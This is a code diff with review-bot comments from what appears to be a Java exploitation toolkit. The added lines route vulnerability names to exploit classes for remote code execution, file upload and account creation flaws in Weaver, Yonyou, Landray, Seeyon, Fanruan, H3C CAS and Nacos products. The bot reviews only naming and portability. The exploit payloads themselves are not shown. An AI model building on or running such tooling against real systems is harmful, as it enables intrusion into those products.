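Review bot: `Alibaba()` (L1368) is the only vendor selector in this class with an upper-case initial; its siblings are `h3c()`, `qianxin()` and `fanruan()`. If these methods are resolved by reflection from the vendor label (the label added on L1300 is also spelled "Alibaba"), the casing is load-bearing and deserves a comment such as `// name must match the label in cms() — resolved by name`; otherwise rename it `alibaba()` to match the rest of the file.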
@@ -242,6 +274,15 @@ public class Kinds_Exp {
}else if(vulName.contains("e-office doexcel.php-RCE")){
ei = new weaveroa_doExecl();
}
+ else if(vulName.contains("e-office8 upload.php-RCE")){
+ ei = new weaveroa_eoffice8_upload();
+ }
+
+
+ else if (vulName.contains("fanruan-design_save_svg-RCE")) {
+ //帆软
+ ei = new fanruan_save_svg();
+ }
else if (vulName.contains("chajet_upload-RCE")) {
//用友
@@ -256,15 +297,22 @@ public class Kinds_Exp {
ei = new yongyou_grp_UploadFileData();
}else if(vulName.contains("KSOA_ImageUpload-RCE")){
ei = new yongyou_KSOA_imageupload();
- }
+ }else if(vulName.contains("NC_UploadServlet-RCE")){
+ ei = new yongyou_nc_uploadServlet();
+ } else if (vulName.contains("GRP_U8_AppProxy-RCE")) {
+ ei = new yongyou_U8_AppProxy();
+ } else if (vulName.contains("KSOA_Attachmentupload-RCE")) {
+ ei = new yongyou_KSOA_Attachmentupload();
- else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
+ } else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
//蓝凌
ei = new landray_sysSearchMain();
} else if (vulName.contains("landray_treexmlTmpl-RCE")) {
ei = new landray_treexmlTmpl();
} else if (vulName.contains("landray_datajson-RCE")) {
ei = new landray_datajson();
+ } else if (vulName.contains("landray_fileupload_sysSearch-RCE")) {
+ ei = new landray_fileupload_sysSearch();
}
else if(vulName.contains("wanhu_OfficeServer-RCE")){
@@ -289,6 +337,10 @@ public class Kinds_Exp {
ei = new seeyonoa_htmlofficeservlet();
}else if(vulName.contains("seeyonoa_ajaxBypass-RCE")){
ei = new seeyonoa_ajaxBypass();
+ }else if(vulName.contains("seeyonoa_seeyonreport_upload-RCE")){
+ ei = new seeyonreport_svg_upload();
+ }else if (vulName.contains("seeyon_testsqli-RCE")) {
+ ei = new seeyon_testsqli();
}
else if(vulName.contains("tongdaoa_getdata-RCE")){
@@ -315,7 +367,16 @@ public class Kinds_Exp {
else if(vulName.contains("上网行为管理账号密码泄露_Leadsec_ACM")){
//网御星云
ei = new Leadsec_ACM_account();
+ } else if (vulName.contains("cas_cvm云计算管理平台-RCE")) {
+ //h3c
+ ei = new cas_cvm_upload();
}
+
+ /*-----CMS-----*/
+ else if (vulName.contains("nacos任意用户添加")) {
+ ei = new nacos_Creatuser();
+ }
+
return ei;
}
}
diff --git a/src/main/java/utils/shell.java b/src/main/java/utils/shell.java
index b023eb2..991bd0c 100644
--- a/src/main/java/utils/shell.java
+++ b/src/main/java/utils/shell.java
@@ -42,6 +42,11 @@ public class shell {
// public static String dnspath = "./Apt_config/dnslog/dnslog.txt";
+
+// public static final String open = "notepad ";
+ public static final String open = "open ";
+
+
//标记内容
public static final String test_payload = "9df37afc77bdd582d90aefaf4e35c63e";
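Review bot: `open` (L1451) hard-codes the macOS launcher, with the Windows `notepad` variant left commented out on L1450, so whichever host a given build is made on, the other platform gets a failing command, and toggling a constant per release is how one of the two ends up shipped broken. The call site is outside this hunk, but prefer `java.awt.Desktop.getDesktop().open(new File(path))` there, or at least choose the launcher once from `System.getProperty("os.name")`. If the constant must stay, document it: `// launcher prefix for the host OS; "open " on macOS, "notepad " on Windows`.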
@@ -179,4 +184,26 @@ public class shell {
}
return sb.toString();
}
+
+
+
+ /*-------------------------------url编码方法---------------------------*/
+
+ public static String gbEncoding(String gbString) {
+ char[] utfBytes = gbString.toCharArray();
+ String unicodeBytes = "";
+
+ for(int i = 0; i < utfBytes.length; ++i) {
+ String hexB = Integer.toHexString(utfBytes[i]);
+ if (hexB.length() <= 2) {
+ hexB = "00" + hexB;
+ }
+
+ unicodeBytes = unicodeBytes + "\\u" + hexB;
+ }
+
+ return unicodeBytes;
+ }
+
+
}